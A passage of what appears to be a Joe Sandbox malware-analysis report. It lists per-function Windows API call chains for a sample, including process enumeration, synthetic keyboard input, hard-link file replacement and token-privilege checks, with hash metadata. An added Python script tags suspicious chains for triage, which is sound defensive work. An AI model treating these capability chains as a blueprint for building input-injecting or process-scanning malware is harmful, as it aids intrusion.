                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006457CE
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006457FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: d2447c6acfb6cd158743bc83463bd2d6f338ede56038a4c574afad90e9fdf67c
                                                                                • Instruction ID: 441a09c1df57d81a03954dc9c5dc81a2015e8950dcd49942b1aeb7cc5ab4171b
                                                                                • Opcode Fuzzy Hash: d2447c6acfb6cd158743bc83463bd2d6f338ede56038a4c574afad90e9fdf67c
                                                                                • Instruction Fuzzy Hash: 46411C35600A11DFCB21DF19C444A59BBE2FF89720F19848AEC4AAB362DB31FD00CB91
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,005F6D71,00000000,00000000,005F82D9,?,005F82D9,?,00000001,005F6D71,?,00000001,005F82D9,005F82D9), ref: 0060D910
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0060D999
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0060D9AB
                                                                                • __freea.LIBCMT ref: 0060D9B4
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: cc02757bb849c4f7a6b613512ab4d5c9154971800ec6f0dd60c0098be7276fc8
                                                                                • Instruction ID: 2253ae2a2baa030ddcaba798387e5233c67ac5ac09aab7e55165084ffbcd6815
                                                                                • Opcode Fuzzy Hash: cc02757bb849c4f7a6b613512ab4d5c9154971800ec6f0dd60c0098be7276fc8
                                                                                • Instruction Fuzzy Hash: 1331AE72A0020AABDB299FA4DC45EEF7BA6EB41320F054268FC04D6290EB35CD50CB90
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00665352
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00665375
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00665382
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006653A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                                                • String ID:
                                                                                • API String ID: 3340791633-0
                                                                                • Opcode ID: 1bccff81583792652c89661212df047d01a9c19cf74646fca9d5df901c4e21b0
                                                                                • Instruction ID: 28e6335c8979a3ff6761347d878398f8d7a71f40e8e5805da7f7d7d308c63a08
                                                                                • Opcode Fuzzy Hash: 1bccff81583792652c89661212df047d01a9c19cf74646fca9d5df901c4e21b0
                                                                                • Instruction Fuzzy Hash: 9231B434A55A08EFEF309F14CC17BE93767AB05B90F545102FA52A63E1E7B0A9409B82
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 0063ABF1
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0063AC0D
                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 0063AC74 (message 0x0101 is WM_KEYUP)
                                                                                • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 0063ACC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 4f5decd169a09a9ad54e11a1175eb8d1cb3e7b8062ac089fd5179ffe1bfab784
                                                                                • Instruction ID: 104aa2ec079e6b54c0280e67cb115284205f86e395e00a440f4b6d7a877ed5e4
                                                                                • Opcode Fuzzy Hash: 4f5decd169a09a9ad54e11a1175eb8d1cb3e7b8062ac089fd5179ffe1bfab784
                                                                                • Instruction Fuzzy Hash: F2310830A046186FEF35CBA5CC087FA7BA7AB85320F04631AE4C5962D1C3758D85A7D6
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 0066769A
                                                                                • GetWindowRect.USER32(?,?), ref: 00667710
                                                                                • PtInRect.USER32(?,?,00668B89), ref: 00667720
                                                                                • MessageBeep.USER32(00000000), ref: 0066778C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: 6bd2a53278a7fb6c4c95f8c559d85f8f1f694be0087f16ffbe0a24027575d330
                                                                                • Instruction ID: 67f37bec90999187c50112ebb785a7dda750694bb5ec039d64a6506353523a3f
                                                                                • Opcode Fuzzy Hash: 6bd2a53278a7fb6c4c95f8c559d85f8f1f694be0087f16ffbe0a24027575d330
                                                                                • Instruction Fuzzy Hash: DE418D34605214EFDB01DF58D894EA9BBF6FB4A318F1980A9E415DF361D730A942CF90
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 006616EB
                                                                                  • Part of subcall function 00633A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00633A57
                                                                                  • Part of subcall function 00633A3D: GetCurrentThreadId.KERNEL32 ref: 00633A5E
                                                                                  • Part of subcall function 00633A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006325B3), ref: 00633A65
                                                                                • GetCaretPos.USER32(?), ref: 006616FF
                                                                                • ClientToScreen.USER32(00000000,?), ref: 0066174C
                                                                                • GetForegroundWindow.USER32 ref: 00661752
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: 903a67bab29f8165b742f44ef9b78b811f95a3efcd730397afd138bc228eede1
                                                                                • Instruction ID: 90c8ed0d10d844ffebb3700ed13b12d0be7fd836768610f0f7400eb83838e2ae
                                                                                • Opcode Fuzzy Hash: 903a67bab29f8165b742f44ef9b78b811f95a3efcd730397afd138bc228eede1
                                                                                • Instruction Fuzzy Hash: F1313071D00149AFC710DFA9C885CEEBBF9FF89304B5480AAE455E7311E6319E45CBA0
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0063D501
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0063D50F
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0063D52F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0063D5DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 420147892-0
                                                                                • Opcode ID: 07673b768bcc707ecfb4c8934568cc089baf2831f4628c8f703d6806e16ef36c
                                                                                • Instruction ID: d436865c8641f3ad509055f1ff5e57fdce1fabce12116ffd7048bbd4ebb77642
                                                                                • Opcode Fuzzy Hash: 07673b768bcc707ecfb4c8934568cc089baf2831f4628c8f703d6806e16ef36c
                                                                                • Instruction Fuzzy Hash: 67319E711082019FD311EF54D885AAFBFE9FFD9354F14092EF581822A1EB719949CB92
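The "APIs" blocks in this report are the most useful part of the function listing when triaging a sample by hand, but reading hundreds of them is slow. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses the report's own call-line format (bullet, API name, module, optional argument list, `ref:` address, with indented "Part of subcall function" lines) into one record per function and tags the API chains that appear in the records above (Toolhelp process enumeration, GetKeyboardState/SetKeyboardState/SendInput, CreateHardLinkW/DeleteFileW, GetForegroundWindow/AttachThreadInput). The chain table and the sample text are constructed for the example; the sample lines are copied from the records on this page.

```python
import re
from typing import Dict, List, Tuple

# One call line of a Joe Sandbox "APIs" block. Handles all three shapes seen
# in the report:
#   • Process32NextW.KERNEL32(00000000,?), ref: 0063D52F
#   • GetForegroundWindow.USER32 ref: 006616EB
#     • Part of subcall function 00633A3D: AttachThreadInput.USER32(...), ref: 00633A65
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# API chains worth a second look, taken from the records in this report.
# A tag fires only when every API in the set is present in one function.
CHAINS: Dict[str, set] = {
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "synthetic_keyboard_input": {"GetKeyboardState", "SetKeyboardState", "SendInput"},
    "hardlink_replace": {"CreateHardLinkW", "DeleteFileW"},
    "foreground_input_attach": {"GetForegroundWindow", "AttachThreadInput"},
}

def parse_records(text: str) -> List[Dict]:
    """Split report text into per-function records, one per 'APIs' block.

    An 'APIs' header opens a record; the 'Memory Dump Source' header that
    follows it in the report closes it. Lines outside a record are ignored.
    """
    records: List[Dict] = []
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"calls": []}
            records.append(current)
            continue
        if current is None:
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        current["calls"].append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": m.group("ref"),
            "subcall": m.group("sub"),  # None for a direct call
        })
    return records

def tag_record(record: Dict) -> List[str]:
    """Return the sorted chain tags whose API set is fully present."""
    names = {c["api"] for c in record["calls"]}
    return sorted(tag for tag, chain in CHAINS.items() if chain <= names)

def scan(text: str) -> List[Tuple[str, List[str]]]:
    """(first ref address, tags) for every tagged function in the text."""
    hits = []
    for rec in parse_records(text):
        tags = tag_record(rec)
        if tags and rec["calls"]:
            hits.append((rec["calls"][0]["ref"], tags))
    return hits

# Constructed sample in the report's format; call lines copied from this page.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0063D501
• Process32FirstW.KERNEL32(00000000,?), ref: 0063D50F
• Process32NextW.KERNEL32(00000000,?), ref: 0063D52F
• CloseHandle.KERNEL32(00000000), ref: 0063D5DC
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp
APIs
• GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 0063ABF1
• SetKeyboardState.USER32(00000080,?,00008000), ref: 0063AC0D
• PostMessageW.USER32(00000000,00000101,00000000), ref: 0063AC74
• SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 0063ACC6
Memory Dump Source
APIs
• GetForegroundWindow.USER32 ref: 006616EB
  • Part of subcall function 00633A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006325B3), ref: 00633A65
• GetCaretPos.USER32(?), ref: 006616FF
Memory Dump Source
"""

if __name__ == "__main__":
    for ref, tags in scan(SAMPLE):
        print(f"function at {ref}: {', '.join(tags)}")
```

The ref address of the first call is a convenient handle for jumping to the function in the dump; the tags only say that a chain is present, so a hit still needs the surrounding calls read in context before it is treated as an indicator.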
APIs
  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
• GetCursorPos.USER32(?), ref: 00669001
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00627711,?,?,?,?,?), ref: 00669016
• GetCursorPos.USER32(?), ref: 0066905E
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00627711,?,?,?), ref: 00669094
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: 6c694971bf317519ef65c82f32d5537f461b7e546d10d8e25e1914216b8a48f0
• Instruction ID: 8f37337941dacb4c8d0b31e89acf6c5bad0b3d4296a55de096bdbbe4a1c928c6
• Opcode Fuzzy Hash: 6c694971bf317519ef65c82f32d5537f461b7e546d10d8e25e1914216b8a48f0
• Instruction Fuzzy Hash: 6B219C35601018FFCF299F94CC58EFA7BBBEB8A360F144069F9458B261C371A990DB60
APIs
• GetFileAttributesW.KERNEL32(?,0066CB68), ref: 0063D2FB
• GetLastError.KERNEL32 ref: 0063D30A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0063D319
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0066CB68), ref: 0063D376
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: b153f85daf6262d6741f4657a74ffbd1b2e2d83fcb44d55a874617f5d42dcc2a
• Instruction ID: 224e890e63d52a1a69980855332715b5307c3c9e14803956bf4b848df476342c
• Opcode Fuzzy Hash: b153f85daf6262d6741f4657a74ffbd1b2e2d83fcb44d55a874617f5d42dcc2a
• Instruction Fuzzy Hash: B6217E705096019FD310DF28E8854AA7BE9EE96724F104A1EF499C33A1DB319E4ACB93
APIs
  • Part of subcall function 00631014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0063102A
  • Part of subcall function 00631014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00631036
  • Part of subcall function 00631014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631045
  • Part of subcall function 00631014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0063104C
  • Part of subcall function 00631014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631062
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006315BE
• _memcmp.LIBVCRUNTIME ref: 006315E1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00631617
• HeapFree.KERNEL32(00000000), ref: 0063161E
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
• Opcode ID: 2796a7357525ba345e636d3830c35274cad38a692e63a791b1547f3595c0f21a
• Instruction ID: 96204692e3f4af073c6ffc5fb50372c63f833942bcc05a508376401c59e41bbb
• Opcode Fuzzy Hash: 2796a7357525ba345e636d3830c35274cad38a692e63a791b1547f3595c0f21a
• Instruction Fuzzy Hash: 3A21AF71E00509EFDF00DFA5C945BEEB7BAEF46354F084469E441AB241E770AE05DBA0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 0066280A
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00662824
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00662832
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00662840
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: b0b069560c1199767e95b7356a701a80a6653e17b830057a4c498f4d03c4645c
• Instruction ID: c1ddd6d2500b34f8e78b10f03763a69c7fe56eaf1529cfbba1ff9d12db188d09
• Opcode Fuzzy Hash: b0b069560c1199767e95b7356a701a80a6653e17b830057a4c498f4d03c4645c
• Instruction Fuzzy Hash: EE219031205912AFD7149B24CC55FAA7B9AAF85324F14815DF4668B7E2C7B1EC42C7D0
APIs
  • Part of subcall function 00638D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0063790A,?,000000FF,?,00638754,00000000,?,0000001C,?,?), ref: 00638D8C
  • Part of subcall function 00638D7D: lstrcpyW.KERNEL32(00000000,?,?,0063790A,?,000000FF,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00638DB2
  • Part of subcall function 00638D7D: lstrcmpiW.KERNEL32(00000000,?,0063790A,?,000000FF,?,00638754,00000000,?,0000001C,?,?), ref: 00638DE3
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00637923
• lstrcpyW.KERNEL32(00000000,?,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00637949
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00637984
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: cd445650880b17703d142bb864f5b72fdf5c322ab7a81d85d1f8dfbea61197b0
• Instruction ID: c86099e4df867f3ee99863c95f0d737302f7296e6f2843e2512c9f51e4e34e40
• Opcode Fuzzy Hash: cd445650880b17703d142bb864f5b72fdf5c322ab7a81d85d1f8dfbea61197b0
• Instruction Fuzzy Hash: 0A11E17A200342AFCB259F35C844EBA77AAFF85350B00412AF842CB3A4EB719801C7A1
APIs
• SendMessageW.USER32(?,00001060,?,00000004), ref: 006656BB
• _wcslen.LIBCMT ref: 006656CD
• _wcslen.LIBCMT ref: 006656D8
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00665816
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID:
• API String ID: 455545452-0
• Opcode ID: 0b733de439959ccf5d07868e1f4b956e1371c9de7540bb4fcaad09cdf8fe0318
• Instruction ID: 01a13377cd78ab56c2eb3a521988e13a926187eded50c33770d6d3b0c03ceaf6
• Opcode Fuzzy Hash: 0b733de439959ccf5d07868e1f4b956e1371c9de7540bb4fcaad09cdf8fe0318
• Instruction Fuzzy Hash: 0711037160060996DF209F61CC86AFE3BADFF11764F10416AF926D6181EBB4DA80CF60
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00631A47
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00631A59
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00631A6F
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00631A8A
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: ea0f1f6237a0611c982f7f5b04e1a6bfd26629404d174fa3c7447ad4bc317a6e
• Instruction ID: 34bcedf4cef8becfeb87ced2b23071ca0d14978d27c9ed74bfe4373126f306b2
• Opcode Fuzzy Hash: ea0f1f6237a0611c982f7f5b04e1a6bfd26629404d174fa3c7447ad4bc317a6e
• Instruction Fuzzy Hash: 1F11393AD01219FFEB10DBA4CD85FADBB79EB09750F200092EA00BB290D6716E50DB94
APIs
• GetCurrentThreadId.KERNEL32 ref: 0063E1FD
• MessageBoxW.USER32(?,?,?,?), ref: 0063E230
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0063E246
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0063E24D
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
